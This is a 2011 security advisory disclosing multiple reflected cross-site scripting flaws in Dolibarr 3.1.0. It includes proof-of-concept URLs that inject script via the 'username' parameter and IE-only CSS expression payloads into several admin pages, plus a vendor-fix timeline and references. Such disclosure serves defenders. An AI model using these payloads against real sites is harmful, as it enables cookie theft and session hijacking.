Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID: INFOSERVE-ADV2011-03
Author: Stefan Schurtz
Contact: security (at) infoserve (dot) de [email concealed]
Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL: http://www.dolibarr.org/
Vendor Status: fixed in the 3.1 branch
Advisory ID: INFOSERVE-ADV2011-03
Author: Stefan Schurtz
Contact: security (at) infoserve (dot) de [email concealed]
Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL: http://www.dolibarr.org/
Vendor Status: fixed in the 3.1 branch
==========================
Vulnerability Description
==========================
Dolibarr 3.1.0 is prone to multiple XSS vulnerability
==================
PoC-Exploit
==================
Cross-Site-Scripting - parameter 'username'
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>&=3&optioncss=print
IE-only
http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))
=========
Solution:
=========
Fixed in the 3.1 branch
====================
Disclosure Timeline:
====================
08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
========
Credits:
========
Vulnerabilities found and advisory written by INFOSERVE Security Team
===========
References:
===========
https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e35
44a4207e78a1
http://www.dolibarr.org/
http://www.infoserve.de/
[ reply ]